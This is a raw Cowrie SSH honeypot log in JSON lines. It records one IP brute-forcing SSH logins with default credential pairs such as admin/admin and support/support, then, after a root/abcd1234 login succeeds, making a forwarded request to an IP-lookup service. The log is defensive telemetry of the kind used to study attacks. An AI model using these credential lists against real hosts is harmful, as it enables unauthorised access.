{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:00:46.181174Z","src_ip":"212.227.235.229","session":"83fd5cb7bc64"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:00:46.325687Z","src_ip":"212.227.235.229","session":"8c1c0c0f6e55"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0l0ctyQh243O63uD","message":"login attempt [admin/0l0ctyQh243O63uD] failed","sensor":"my-vps","timestamp":"2025-08-28T08:00:46.456631Z","src_ip":"212.227.235.229","session":"f680e52c04fe"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:00:46.534833Z","src_ip":"212.227.235.229","session":"576ed79ea1e8"}
{"eventid":"cowrie.login.failed","username":"config","password":"config","message":"login attempt [config/config] failed","sensor":"my-vps","timestamp":"2025-08-28T08:00:47.030919Z","src_ip":"212.227.235.229","session":"d10ad1b13232"}
{"eventid":"cowrie.session.closed","duration":"11.1","message":"Connection lost after 11.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:00:48.299643Z","src_ip":"212.227.235.229","session":"f680e52c04fe"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:00:48.786265Z","src_ip":"212.227.235.229","session":"2e5947b9a112"}
{"eventid":"cowrie.session.closed","duration":"71.2","message":"Connection lost after 71.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:00:49.013047Z","src_ip":"212.227.235.229","session":"d10ad1b13232"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:00:49.040206Z","src_ip":"212.227.235.229","session":"59ed948beea6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35760,"dst_ip":"1.2.3.4","dst_port":22,"session":"adb7050d5244","protocol":"ssh","message":"New connection: 212.227.235.229:35760 (1.2.3.4:22) [session: adb7050d5244]","sensor":"my-vps","timestamp":"2025-08-28T08:00:49.620856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:00:49.831238Z","src_ip":"212.227.235.229","session":"adb7050d5244"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:00:49.914582Z","src_ip":"212.227.235.229","session":"adb7050d5244"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234","message":"login attempt [user/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T08:00:51.180719Z","src_ip":"212.227.235.229","session":"adb7050d5244"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:00:52.485648Z","src_ip":"212.227.235.229","session":"adb7050d5244"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin@123","message":"login attempt [admin/admin@123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:00:53.138946Z","src_ip":"212.227.235.229","session":"2e5947b9a112"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:00:54.394732Z","src_ip":"212.227.235.229","session":"2e5947b9a112"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:00:54.465236Z","src_ip":"212.227.235.229","session":"83fd5cb7bc64"}
{"eventid":"cowrie.login.failed","username":"system","password":"OkwKcECs8qJP2Z","message":"login attempt [system/OkwKcECs8qJP2Z] failed","sensor":"my-vps","timestamp":"2025-08-28T08:00:55.266537Z","src_ip":"212.227.235.229","session":"83fd5cb7bc64"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd1234","message":"login attempt [root/abcd1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:00:55.511078Z","src_ip":"212.227.235.229","session":"59ed948beea6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:00:56.196419Z","session":"59ed948beea6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:00:56.816503Z","src_ip":"212.227.235.229","session":"59ed948beea6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35768,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6ccfa42d680","protocol":"ssh","message":"New connection: 212.227.235.229:35768 (1.2.3.4:22) [session: e6ccfa42d680]","sensor":"my-vps","timestamp":"2025-08-28T08:00:57.010052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:00:57.061013Z","src_ip":"212.227.235.229","session":"e6ccfa42d680"}
{"eventid":"cowrie.session.closed","duration":"12.2","message":"Connection lost after 12.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:00:57.072267Z","src_ip":"212.227.235.229","session":"59ed948beea6"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:00:57.289089Z","src_ip":"212.227.235.229","session":"e6ccfa42d680"}
{"eventid":"cowrie.session.closed","duration":"11.2","message":"Connection lost after 11.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:00:57.421438Z","src_ip":"212.227.235.229","session":"83fd5cb7bc64"}
{"eventid":"cowrie.login.failed","username":"admin","password":"default","message":"login attempt [admin/default] failed","sensor":"my-vps","timestamp":"2025-08-28T08:01:01.427978Z","src_ip":"212.227.235.229","session":"e6ccfa42d680"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42514,"dst_ip":"1.2.3.4","dst_port":22,"session":"f38cc8704f1e","protocol":"ssh","message":"New connection: 212.227.235.229:42514 (1.2.3.4:22) [session: f38cc8704f1e]","sensor":"my-vps","timestamp":"2025-08-28T08:01:03.027557Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:01:03.034936Z","src_ip":"212.227.235.229","session":"f38cc8704f1e"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-08-28T08:01:03.415152Z","src_ip":"212.227.235.229","session":"dceca0ec301e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:01:03.540170Z","src_ip":"212.227.235.229","session":"f38cc8704f1e"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:01:03.931591Z","src_ip":"212.227.235.229","session":"e6ccfa42d680"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T08:01:04.082798Z","src_ip":"212.227.235.229","session":"cd65d34d64eb"}
{"eventid":"cowrie.session.closed","duration":"57.6","message":"Connection lost after 57.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:01:04.915796Z","src_ip":"212.227.235.229","session":"dceca0ec301e"}
{"eventid":"cowrie.session.closed","duration":"30.1","message":"Connection lost after 30.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:01:05.353958Z","src_ip":"212.227.235.229","session":"cd65d34d64eb"}
